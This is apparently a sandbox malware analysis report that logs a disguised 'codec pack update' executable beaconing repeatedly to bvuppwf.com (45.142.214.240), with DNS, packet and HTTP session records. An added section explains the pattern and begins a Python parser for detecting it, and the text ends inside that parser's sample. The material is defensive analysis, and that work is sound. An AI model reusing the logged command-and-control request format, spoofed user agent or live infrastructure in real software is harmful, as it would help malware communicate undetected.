                                                                        Mar 29, 2024 12:59:56.728317022 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.728719950 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.944904089 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.945055008 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.945214987 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.950623989 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.950697899 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:57.161375046 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:57.244874001 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:57.245011091 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:58.814126015 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:58.814440966 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.030622959 CET804981345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.030814886 CET4981380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.030847073 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.031008005 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.031291962 CET4981480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:59.248455048 CET804981445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:59.332313061 CET804981445.142.214.240192.168.2.4
Mar 29, 2024 12:59:59.332379103 CET | 49814 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.457117081 CET | 49814 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.457681894 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.673579931 CET | 80 | 49814 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 12:59:59.673691034 CET | 49814 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.675194979 CET | 80 | 49815 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 12:59:59.675281048 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.675457001 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 12:59:59.893695116 CET | 80 | 49815 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 12:59:59.972255945 CET | 80 | 49815 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 12:59:59.977077961 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.096493006 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.096760988 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.317219019 CET | 80 | 49815 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:00.317281961 CET | 49815 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.317465067 CET | 80 | 49816 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:00.317545891 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.317750931 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.538278103 CET | 80 | 49816 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:00.622545958 CET | 80 | 49816 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:00.622678995 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.925067902 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:00.925471067 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.144150019 CET | 80 | 49817 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.144239902 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.144442081 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.145929098 CET | 80 | 49816 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.145976067 CET | 49816 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.363008976 CET | 80 | 49817 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.452119112 CET | 80 | 49817 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.456427097 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.576957941 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.577289104 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.795030117 CET | 80 | 49818 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.795205116 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.795670033 CET | 80 | 49817 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:01.795743942 CET | 49817 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:01.795964956 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.014519930 CET | 80 | 49818 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.097373009 CET | 80 | 49818 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.097448111 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.218393087 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.218686104 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.436045885 CET | 80 | 49818 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.436131954 CET | 49818 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.441905022 CET | 80 | 49819 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.442037106 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.442250967 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.664628029 CET | 80 | 49819 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.749161005 CET | 80 | 49819 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:02.749219894 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.863456964 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:02.863837004 CET | 49820 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:03.080363035 CET | 80 | 49820 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:03.080440998 CET | 49820 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:03.080619097 CET | 49820 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:03.086133003 CET | 80 | 49819 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:03.086184978 CET | 49819 | 80 | 192.168.2.4 | 45.142.214.240
Mar 29, 2024 13:00:03.297362089 CET | 80 | 49820 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:03.385246992 CET | 80 | 49820 | 45.142.214.240 | 192.168.2.4
Mar 29, 2024 13:00:03.385303020 CET | 49820 | 80 | 192.168.2.4 | 45.142.214.240
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 12:58:53.502712965 CET | 63632 | 53 | 192.168.2.4 | 91.211.247.248
Mar 29, 2024 12:58:53.711462975 CET | 53 | 63632 | 91.211.247.248 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 12:58:53.502712965 CET | 192.168.2.4 | 91.211.247.248 | 0x14d3 | Standard query (0) | bvuppwf.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 12:58:53.711462975 CET | 91.211.247.248 | 192.168.2.4 | 0x14d3 | No error (0) | bvuppwf.com | | 45.142.214.240 | A (IP address) | IN (0x0001) | false
• bvuppwf.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:58:54.025398016 CET | 318 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:54.341233015 CET | 1232 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Ascii: 40067b68a8a3203a77b0418f55f677c80c450fe90cdef1701eaaa42bb4690a1e4aed3de09d841d3f38f7173ff23a794c91e28f7735eb376f579a8365fc3fed303c446d37cb515e1318e2ffa11a762cf50bbe34ee65b7746f2256592256588e114c6e5969a3bc66e9513c651872ba858b7e94123e97dd8fc79b98fe4d443e220c81735435f22fd227a0267b9ec86ff8f284fe4427d26e0285ef1f6e48cfa357aa0ec599387fd642f1aa369ec9ec1b165d1600420347aae52cdc3ae3b30bbcd08b201b9a239b1c0d532752c10d230f512e9d1b4024fd23412cc50c5f563832cb49540a3ebd0a2c13e23be73bce50f85a1bc7544a985ea23affb8f871fed14e952885264cfabc0f9df5466a79ce438af74890f3ca320ca39dc981ec958b02f05145bcbd76e5c30536283e28f2a32614e11d1c3b31919fcd6b8e9d63c7765ef3f9bc3010e5e94aece004c44d476745d3550e2d1cccdf1cb4d9d3e6544fb7c348929beca8d79894ac18429020a6795fd9cea180fad2c8bc6107207c336c9f38f09773c7b9f3502ed574f7f798f4ec4b9a0e02aa2d0c01a508d2dc8425d8cbad27bd05032a96ae02d38b262835e1fcfa4a4ae64afc8129a4ec8dfce4bb311b741ffafb0659bae25ab2f3c1236c583661de1a7d54b76e22c382a1418c97fef03fd70ce1e8af9969e5da804cdd8df807a4d912031f6dc01920a0a004ad942165a31420ae1ac0
Mar 29, 2024 12:58:56.981125116 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:57.321274996 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:58:57.434223890 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:57.738240004 CET | 1092 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:58:58.279145002 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:58.586544991 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:58:58.916636944 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:59.219975948 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:58:59.558298111 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:58:59.854916096 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:58:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:58:59.965425014 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:00.274084091 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:00.626739979 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:00.923988104 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:01.268338919 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:01.578259945 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:01.924237967 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:02.229691982 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:02.340536118 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:02.636924028 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:02.972625017 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:03.279911041 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:03.387979984 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:03.695990086 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 34 39 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 65 64 32 65 61 31 37 31 36 66 35 61 32 35 63 65 61 31 64 64 35 66 62 38 63 65 37 39 37 38 37 34 64 38 62 34 64 64 62 65 30 63 30 33 37 33 34 62 39 34 64 66 38 64 35 64 61 31 61 32 35 65 33 37 32 35 38 61 64 37 65 66 37 36 34 61 63 32 64 35 34 63 38 66 66 63 64 30 39 63 36 35 64 63 63 37 62 62 34 31 61 66 65 33 33 38 61 32 36 65 66 31 31 61 65 36 33 64 62 35 32 62 38 65 33 35 30 65 66 35 38 37 38 35 64 65 39 32 34 36 64 39 34 33 62 36 37 38 65 66 34 31 32 63 38 66 31 39 34 39 32 33 62 64 33 36 39 39 33 30 38 64 63 35 38 38 35 32 39 62 36 35 39 62 38 65 66 35 61 33 66 65 66 37 61 63 63 66 63 37 61 62 64 39 31 65 64 64 31 34 38 65 63 33 66 63 39 31 36 33 35 35 36 35 38 32 30 65 34 33 62 37 31 30 61 37 38 62 62 65 64 38 61 65 30 38 37 32 38 35 37 65 63 35 64 37 62 32 31 66 35 32 62 35 38 65 39 66 65 65 37 38 38 65 34 33 66 37 33 62 61 65 63 34 65 39 38 38 35 66 62 37 61 32 63 31 34 62 35 37 36 65 62 39 65 64 35 62 31 36 36 63 66 36 61 30 30 32 32 33 32 36 34 61 63 35 63 63 61 64 38 62 33 33 38 32 62 62 66 64 37 30 63 62 63 30 39 61 37 61 33 33 33 62 63 63 66 63 38 33 30 37 34 32 61 30 35 64 32 33 38 65 65 30 64 65 66 64 33 62 39 31 39 34 64 64 34 32 31 31 36 63 32 35 66 64 38 66 33 36 33 39 36 32 63 62 34 39 33 34 30 61 33 65 61 64 31 62 36 63 31 33 66 32 33 61 30 37 61 62 39 65 62 30 30 39 61 61 30 62 63 37 33 35 31 61 31 38 65 66 30 33 66 61 63 66 66 38 35 39 38 31 61 65 66 30 61 65 35 35 32 38 61 34 64 36 63 63 66 62 65 63 30 66 34 64 64 35 34 36 35 62 66 39 66 65 39 32 34 61 64 37 37 38 66 30 35 33 34 61 62 32 32 64 66 33 39 64 39 39 65 31 65 63 61 35 65 62 33 32 66 30 63 31 35 34 66 63 62 64 34 36 38 35 36 33 38 35 32 36 35 38 65 66 64 38 36 32 66 33 32 36 32 34 61 31 33 64 31 63 31 62 33 30 65 31 32 66 39 64 30 62 32 65 38 64 64 33 34 37 34 37 32 65 32 32 31 
38 37 63 33 30 33 31 35 34 31 39 64 62 34 63 35 30 34 34 63 34 65 64 31 37 64 37 35 35 31 33 32 34 36 65 36 63 66 64 34 63 63 65 65 63 62 35 30 39 66 32 32 36 64 34 37 66 65 37 36 33 35 38 37 32 38 62 36 63 34 39 32 37 37 38 66 34 61 63 31 38 63 32 36 30 32 30 32 36 33 38 33 66 35 39 63 65 66 31 32 30 65 61 36 32 66 38 61 64 33 31 61 37 62 31 64 64 35 33 37 64 32 66 35 39 35 30 66 36 38 33 34 37 37 39 38 33 66 30 30 65 64 35 63 34 36 37 65 36 63 38 65 34 65 63 34 62 39 61 32 65 30 32 61 61 31 64 34 63 37 30 65 35 33 38 35 32 37 63 39 34 32 35 36 38 64 62 39 64 36 36 32 64 34 34 66 33 61 62 37 37 36 65 33 32 63 32 37 61 64 36 35 38 32 35 64 31 37 63 65 61 34 61 34 61 65 36 34 61 66 63 38 31 32 39 61 34 65 63 38 64 66 63 66 34 65 62 33 31 39 62 33 34 39 66 36 61 64 62 30 36 35 39 30 61 66 32 39 61 63 33 31 33 34 30 63 32 39 63 36 38 32 37 39 30 32 65 38 61 33 63 32 34 37 37 37 65 38 32 65 33 33 32 62 31 63 31 64 63 31 32 38 61 39 35 39 61 34 31 37 39 62 35 66 64 63 61 36 63 30 39 39 34 39 66 39 34 31 38 39 38 62 62 33 63 31 33 35 30 63 64 33 32 39 33 39 61 35 38 35 35 39 64 66 35 30 30 36 30 62 34 35 64 30 34 36 31 30 35 66 33 31 34 32 30 32 66 61 39 35 34 65 35 66 61 62 30 39 33 35 64 34 66 33 61 61 31 64 63 31 65 39 37 33 62 31 65 31 65 32 66 66 31 64 32 38 37 35 63 30 30 33 63 36 63 34 30 62 61 34 35 38 66 65 35 35 32 32 37 34 62
Data Ascii: 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
Mar 29, 2024 12:59:03.696019888 CET | 104 | IN | Data Raw: 31 64 31 34 36 61 34 38 63 31 30 30 31 33 32 66 61 63 34 32 65 63 63 63 33 38 31 64 63 64 64 62 30 37 64 38 62 64 64 33 37 32 32 33 31 30 39 33 61 61 32 37 35 32 32 66 31 62 66 66 64 62 32 62 35 33 37 31 64 63 64 61 32 63 37 39 61 34 38 66 35 66
Data Ascii: 1d146a48c100132fac42eccc381dcddb07d8bdd372231093aa27522f1bffdb2b5371dcda2c79a48f5f4b54d390abd47740
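The sessions above repeat one request: the same GET /search/?q=<hex> to bvuppwf.com from codecpackupdate.exe every fraction of a second, the same User-Agent each time, and a chunked reply that usually carries only 14 bytes. The following Python is an added example written for this report, not Joe Sandbox code and not anything taken from the sample. It parses lines in the fused layout the report uses ("CET326OUTGET ..."), decodes the chunked reply bodies from the Data Raw hex (flagging a capture that ends mid-chunk and folding a continuation packet into the reply it belongs to), and groups identical requests to measure their cadence. The sample lines are constructed to mirror the sessions above, with the q value shortened and the long reply's hex trimmed. The two User-Agent checks are the author's heuristics: no released Windows identifies itself as NT 9.0, and Internet Explorer always placed "compatible;" before its MSIE token.

```python
"""Flag the beacon in these Joe Sandbox HTTP session lines (added example, not Joe Sandbox
code): parse the fused packet layout, decode the chunked replies, group repeated requests."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the report's own layout: q is shortened and the last reply's
# hex is trimmed on purpose so the decoder has to cope with a capture cut mid-chunk.
SAMPLE_LOG = """\
Mar 29, 2024 12:59:01.924237967 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:02.229691982 CET220INHTTP/1.1 200 OK
Transfer-Encoding: chunked
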